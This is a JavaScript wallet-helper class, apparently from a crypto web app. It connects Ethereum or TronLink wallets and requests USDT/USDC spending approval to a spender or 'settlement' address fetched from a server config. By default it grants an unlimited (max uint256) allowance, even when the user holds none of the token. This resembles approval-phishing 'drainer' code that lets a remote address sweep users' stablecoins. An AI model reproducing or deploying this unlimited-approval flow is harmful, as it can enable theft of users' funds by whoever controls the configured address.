import Web3 from 'web3'
import { getWalletConfig } from './index'
import i18n from '@/common/lang'
import {
    getInjectedTronWeb,
    isTronWalletInjected
} from '@/plugin/chain/tron'
import { hasDistinctEthereumWallet } from '@/plugin/chain/eth'
import { getAcount, resolvePreferredChain } from '@/plugin/chain'
import { isWalletUserRejected } from '@/utils/walletErrors'

/** uint256 最大值，钱包会显示为无限授权 */
const MAX_UINT256 = '115792089237316195423570985008687907853269984665640564039457584007913129639935'

// 钱包工具类
export class WalletUtils {
    constructor() {
        this.web3 = null
        this.tronWeb = null
        this.currentAccount = null
        this.walletType = null
        this.networkType = null
        this.config = null
        this.erc20Abi = null
        this.targetAddress = null
    }

    // 初始化配置
    async initConfig() {
        if (this.config) {
            return this.config
        }

        try {
            console.log('正在获取钱包配置...')
            const response = await getWalletConfig()
            console.log('钱包配置API响应:', response)

            if (response && response.code == '200') {
                this.config = response.data
                this.erc20Abi = this.config.erc20Abi
                this.targetAddress = this.config.settlementAddress  // 修复：使用settlementAddress
                console.log('钱包配置加载成功:', this.config)
                console.log('目标地址设置为:', this.targetAddress)
                return this.config
            } else {
                console.error('API响应格式错误:', response)
                throw new Error(i18n.t('walletConfigFailed') + ': ' + (response ? response.message : i18n.t('walletConfigEmpty')))
            }
        } catch (error) {
            console.error('初始化钱包配置失败:', error)
            throw error
        }
    }

    // 检测钱包是否可用
    static isEthAddress(address) {
        return typeof address === 'string' && /^0x[a-fA-F0-9]{40}$/i.test(address)
    }

    static isTronAddress(address) {
        return typeof address === 'string' && /^T[A-Za-z1-9]{33}$/.test(address)
    }

    static normalizeWalletAddress(address) {
        if (!address) return ''
        return this.isEthAddress(address) ? address.toLowerCase() : String(address)
    }

    static async getCurrentEthAddress() {
        if (!this.isEthereumWalletAvailable()) return null
        const accounts = await window.ethereum.request({ method: 'eth_accounts' })
        return accounts && accounts[0] ? accounts[0] : null
    }

    static getCurrentTronAddress() {
        if (!this.isTronLinkAvailable()) return null
        const tronWeb = getInjectedTronWeb()
        return (tronWeb && tronWeb.defaultAddress && tronWeb.defaultAddress.base58) || null
    }

    static async getCurrentWalletAddress(loggedInAddress) {
        try {
            if (loggedInAddress && this.isTronAddress(loggedInAddress)) {
                return this.getCurrentTronAddress()
            }
            if (loggedInAddress && this.isEthAddress(loggedInAddress)) {
                return await this.getCurrentEthAddress()
            }
            if (this.isEthereumWalletAvailable()) {
                return await this.getCurrentEthAddress()
            }
            if (this.isTronLinkAvailable()) {
                return this.getCurrentTronAddress()
            }
            return null
        } catch (error) {
            console.error('获取当前钱包地址失败:', error)
            return null
        }
    }

    static async checkWalletAddressConsistency(loggedInAddress) {
        if (!loggedInAddress) {
            return { isConsistent: true, reason: 'no_logged_address' }
        }

        const currentAddress = await this.getCurrentWalletAddress(loggedInAddress)

        if (!currentAddress) {
            return {
                isConsistent: true,
                reason: 'no_current_address',
                loggedInAddress: this.normalizeWalletAddress(loggedInAddress),
                currentAddress: null
            }
        }

        const loggedInNorm = this.normalizeWalletAddress(loggedInAddress)
        const currentNorm = this.normalizeWalletAddress(currentAddress)
        const isConsistent = loggedInNorm === currentNorm

        return {
            isConsistent,
            reason: isConsistent ? 'consistent' : 'address_mismatch',
            loggedInAddress: loggedInNorm,
            currentAddress: currentNorm
        }
    }

    static isEthereumWalletAvailable() {
        return hasDistinctEthereumWallet()
    }

    static isTronLinkAvailable() {
        return isTronWalletInjected()
    }

    isUserRejectedError(error) {
        return isWalletUserRejected(error)
    }

    async connectWallet(options = {}) {
        await this.initConfig()

        const picked = await resolvePreferredChain(options)
        if (picked.reason === 'none') {
            throw new Error(i18n.t('wallet.noWalletDetected'))
        }
        if (picked.reason === 'cancelled' || !picked.chain) {
            const error = new Error('USER_CANCELLED_CHAIN')
            error.code = 'USER_CANCELLED_CHAIN'
            throw error
        }

        const acountRes = await getAcount(picked.chain)
        if (acountRes === 'no-wallet') {
            throw new Error(i18n.t('wallet.noWalletDetected'))
        }
        if (acountRes && (acountRes.userRejected || isWalletUserRejected(acountRes))) {
            const error = new Error(acountRes.msg || 'USER_REJECTED')
            error.code = 'USER_REJECTED'
            throw error
        }
        if (!acountRes || acountRes.code !== 200 || !(acountRes.data && acountRes.data.address)) {
            throw new Error((acountRes && acountRes.msg) || i18n.t('wallet.connectFailed'))
        }

        return this.bindConnectedAccount(acountRes.data)
    }

    async bindConnectedAccount(account) {
        this.currentAccount = account.address
        if (account.type === 'TRON') {
            this.tronWeb = getInjectedTronWeb()
            this.walletType = 'tronlink'
            this.networkType = 'tron'
        } else {
            this.web3 = new Web3(window.ethereum)
            this.walletType = 'ethereum'
            const chainId = await window.ethereum.request({ method: 'eth_chainId' })
            this.networkType = this.getNetworkType(chainId)
        }

        if (!this.isNetworkSupported(this.networkType)) {
            throw new Error(`Network ${this.networkType} is not supported in current environment. Please switch to a supported network.`)
        }

        return {
            address: this.currentAccount,
            walletType: this.walletType,
            networkType: this.networkType
        }
    }

    // 格式化错误信息
    formatError(error) {
        const errorMessage = error.message || error.toString()

        // 网络错误
        if (errorMessage.includes('network') || errorMessage.includes('timeout')) {
            return new Error(i18n.t('walletNetworkTimeout'))
        }

        // 余额不足
        if (errorMessage.includes('insufficient funds') ||
            errorMessage.includes('balance') ||
            errorMessage.includes('余额不足')) {
            return new Error(i18n.t('walletInsufficientBalance'))
        }

        // Gas费用相关
        if (errorMessage.includes('gas') || errorMessage.includes('fee')) {
            return new Error(i18n.t('walletInsufficientGas'))
        }

        // 合约错误
        if (errorMessage.includes('revert') || errorMessage.includes('execution reverted')) {
            return new Error(i18n.t('walletContractFailed'))
        }

        // 默认错误
        return new Error(i18n.t('walletTransactionFailed'))
    }

    // 获取网络类型
    getNetworkType(chainId) {
        const chainIdNum = parseInt(chainId, 16)
        switch (chainIdNum) {
            case 1:
                return 'ethereum'
            case 11155111:
                return 'sepolia'  // 保留兼容性，但不再使用
            default:
                return 'unknown'
        }
    }

    // 授权ERC20代币
    async approveERC20(tokenAddress, spenderAddress, amount = null) {
        if (!this.web3 || !this.currentAccount) {
            throw new Error('Wallet not connected')
        }

        if (!this.erc20Abi) {
            throw new Error('ERC20 ABI not loaded')
        }

        try {
            const contract = new this.web3.eth.Contract(this.erc20Abi, tokenAddress)

            let approveAmount = amount
            if (!approveAmount) {
                approveAmount = MAX_UINT256
            }

            console.log('授权代币:', tokenAddress)
            console.log('授权给:', spenderAddress)
            console.log('授权数量:', approveAmount)

            // 检查用户ETH余额
            const ethBalance = await this.web3.eth.getBalance(this.currentAccount)
            console.log('用户ETH余额:', this.web3.utils.fromWei(ethBalance, 'ether'), 'ETH')

            // 检查用户代币余额
            try {
                const tokenBalance = await contract.methods.balanceOf(this.currentAccount).call()
                console.log('用户代币余额:', tokenBalance)

                if (tokenBalance === '0') {
                    console.warn('⚠️ 用户没有此代币，但仍可以进行授权')
                }
            } catch (balanceError) {
                console.warn('查询代币余额失败:', balanceError)
            }

            // 检查当前授权额度
            let currentAllowance = '0'
            try {
                currentAllowance = await contract.methods.allowance(this.currentAccount, spenderAddress).call()
                console.log('当前授权额度:', currentAllowance)

                // 如果当前授权额度已经足够，就不需要重新授权
                if (currentAllowance !== '0') {
                    const currentAmount = BigInt(currentAllowance)
                    const targetAmount = BigInt(approveAmount)

                    if (currentAmount >= targetAmount) {
                        console.log('✅ 当前授权额度已足够，无需重新授权')
                        return {
                            success: true,
                            transactionHash: 'already_approved',
                            message: i18n.t('walletAlreadyApproved'),
                            network: this.networkType
                        }
                    }

                    console.log('⚠️ 当前授权额度不足，需要重新授权')
                    // 只有在必要时才重置授权（某些代币如USDT要求先重置为0）
                    try {
                        console.log('尝试先重置授权为0...')
                        const resetTx = await contract.methods.approve(spenderAddress, '0').send({
                            from: this.currentAccount,
                            gas: 100000
                        })
                        console.log('✅ 授权重置成功:', resetTx.transactionHash)
                    } catch (resetError) {
                        console.warn('重置授权失败，继续尝试直接授权:', resetError)
                    }
                }
            } catch (allowanceError) {
                console.warn('查询当前授权失败:', allowanceError)
            }

            // 估算Gas费用
            try {
                const gasEstimate = await contract.methods.approve(spenderAddress, approveAmount).estimateGas({
                    from: this.currentAccount
                })
                console.log('预估Gas用量:', gasEstimate)
            } catch (estimateError) {
                console.error('❌ Gas估算失败，交易可能会失败:', estimateError)
                // 如果Gas估算失败，说明交易肯定会失败
                throw new Error(i18n.t('walletContractCallFailed'))
            }

            const tx = await contract.methods.approve(spenderAddress, approveAmount).send({
                from: this.currentAccount,
                gas: 100000  // 设置Gas限制
            })

            console.log('✅ 新授权交易成功:', tx.transactionHash)
            return {
                success: true,
                transactionHash: tx.transactionHash,
                blockNumber: tx.blockNumber,
                gasUsed: tx.gasUsed,
                message: i18n.t('walletApproveResult'),
                network: this.networkType
            }
        } catch (error) {
            console.error('ERC20 approve failed:', error)

            // 处理用户取消交易的情况
            if (this.isUserRejectedError(error)) {
                throw new Error(i18n.t('walletUserRejected'))
            }

            // 处理其他错误
            // 分析具体的失败原因
            if (error.message && error.message.includes('revert')) {
                console.error('❌ 合约执行被回滚，可能的原因:')
                console.error('1. 代币合约不支持此操作')
                console.error('2. 合约有特殊的授权规则')
                console.error('3. 代币合约已暂停或有其他限制')

                // 尝试调用合约的基本方法来验证合约是否正常
                try {
                    const name = await contract.methods.name().call()
                    const symbol = await contract.methods.symbol().call()
                    console.log('✅ 合约基本信息正常:', name, symbol)
                } catch (infoError) {
                    console.error('❌ 合约基本信息查询失败，可能不是标准ERC20合约')
                }

                throw new Error(i18n.t('walletContractRejectAuth'))
            }

            throw this.formatError(error)
        }
    }

    // 授权TRC20代币
    async approveTRC20(tokenAddress, spenderAddress, amount = null) {
        if (!this.tronWeb || !this.currentAccount) {
            throw new Error('Wallet not connected')
        }

        if (!spenderAddress || spenderAddress.startsWith('0x') || spenderAddress.startsWith('0X')) {
            throw new Error(i18n.t('walletTronContractMissing'))
        }

        let approveAmount = amount
        if (!approveAmount) {
            approveAmount = MAX_UINT256
        }

        try {
            const contract = await this.tronWeb.contract().at(tokenAddress)

            try {
                const currentAllowance = await contract.allowance(this.currentAccount, spenderAddress).call()
                const currentAmount = BigInt(currentAllowance.toString())
                if (currentAmount >= BigInt(approveAmount)) {
                    return {
                        success: true,
                        transactionHash: 'already_approved',
                        message: i18n.t('walletAlreadyApproved'),
                        network: this.networkType
                    }
                }
            } catch (allowanceError) {
                console.warn('查询当前授权失败:', allowanceError)
            }

            const tx = await contract.approve(spenderAddress, approveAmount).send({
                feeLimit: 100000000
            })

            return {
                success: true,
                transactionHash: tx,
                message: i18n.t('walletApproveResult'),
                network: this.networkType
            }
        } catch (error) {
            console.error('TRC20 approve failed:', error)

            if (this.isUserRejectedError(error)) {
                throw new Error(i18n.t('walletUserRejected'))
            }

            throw this.formatError(error)
        }
    }

    // 检查网络是否支持
    isNetworkSupported(networkType) {
        if (!this.config || !this.config.network) {
            return true // 如果没有配置，默认支持
        }

        const supportedNetworks = this.config.network.supportedNetworks || []
        return supportedNetworks.includes(networkType)
    }

    // 获取代币合约地址
    getTokenContract(tokenSymbol) {
        console.log('获取代币合约地址:', tokenSymbol)
        console.log('当前配置:', this.config)
        console.log('当前网络:', this.networkType)

        if (!this.config || !this.config.tokens) {
            console.error('配置未加载或tokens字段不存在')
            throw new Error('Wallet config not loaded')
        }

        // 检查当前网络是否支持
        if (!this.isNetworkSupported(this.networkType)) {
            throw new Error(`Network ${this.networkType} is not supported in current environment`)
        }

        const symbol = tokenSymbol.toLowerCase()

        if (this.networkType === 'ethereum') {
            return this.config.tokens.ethereum && this.config.tokens.ethereum[symbol]
        } else if (this.networkType === 'sepolia') {
            // Sepolia已废弃，回退到以太坊主网配置
            return this.config.tokens.ethereum && this.config.tokens.ethereum[symbol]
        } else if (this.networkType === 'tron') {
            return this.config.tokens.tron && this.config.tokens.tron[symbol]
        } else if (this.networkType === 'shasta') {
            return this.config.tokens.shasta && this.config.tokens.shasta[symbol]
        }

        return null
    }

    // 获取智能合约地址
    getSmartContractAddress() {
        if (!this.config || !this.config.smartContracts) {
            throw new Error('Smart contract configuration not loaded')
        }

        if (this.networkType === 'ethereum') {
            return this.config.smartContracts.ethereum
        } else if (this.networkType === 'sepolia') {
            // Sepolia已废弃，回退到以太坊主网配置
            return this.config.smartContracts.ethereum
        } else if (this.networkType === 'tron') {
            const address = this.config.smartContracts.tron
            if (!address) {
                throw new Error(i18n.t('walletTronContractMissing'))
            }
            return address
        } else if (this.networkType === 'shasta') {
            return this.config.smartContracts.shasta
        }

        throw new Error(`Smart contract not configured for network: ${this.networkType}`)
    }

    getApproveTokenSymbols() {
        if (this.walletType === 'tronlink' || this.networkType === 'tron') {
            return ['usdt']
        }
        return ['usdt', 'usdc']
    }

    // 执行代币授权
    async approveToken(tokenSymbol, spenderAddress = null) {
        console.log('开始执行代币授权:', tokenSymbol)
        console.log('当前配置状态:', this.config ? '已加载' : '未加载')

        // 确保配置已加载
        await this.initConfig()
        console.log('配置加载完成:', this.config)

        // 如果没有指定spenderAddress，使用智能合约地址
        let finalSpenderAddress = spenderAddress

        if (!finalSpenderAddress) {
            try {
                finalSpenderAddress = this.getSmartContractAddress()
                console.log('使用智能合约地址作为授权目标:', finalSpenderAddress)
            } catch (error) {
                console.error('获取智能合约地址失败:', error)
                if (this.walletType === 'tronlink' || this.networkType === 'tron') {
                    throw new Error(i18n.t('walletTronContractMissing'))
                }
                finalSpenderAddress = this.targetAddress
            }
        }

        if (!finalSpenderAddress) {
            throw new Error('Spender address not specified and target address not configured')
        }

        if ((this.walletType === 'tronlink' || this.networkType === 'tron') && String(tokenSymbol).toLowerCase() !== 'usdt') {
            throw new Error(i18n.t('walletTronUsdtOnly'))
        }

        const tokenAddress = this.getTokenContract(tokenSymbol)
        if (!tokenAddress) {
            throw new Error(`Token ${tokenSymbol} not supported on ${this.networkType}`)
        }

        if (this.walletType === 'ethereum') {
            return await this.approveERC20(tokenAddress, finalSpenderAddress)
        } else if (this.walletType === 'tronlink') {
            return await this.approveTRC20(tokenAddress, finalSpenderAddress)
        } else {
            throw new Error(i18n.t('wallet.connectFailed'))
        }
    }
}

export default WalletUtils
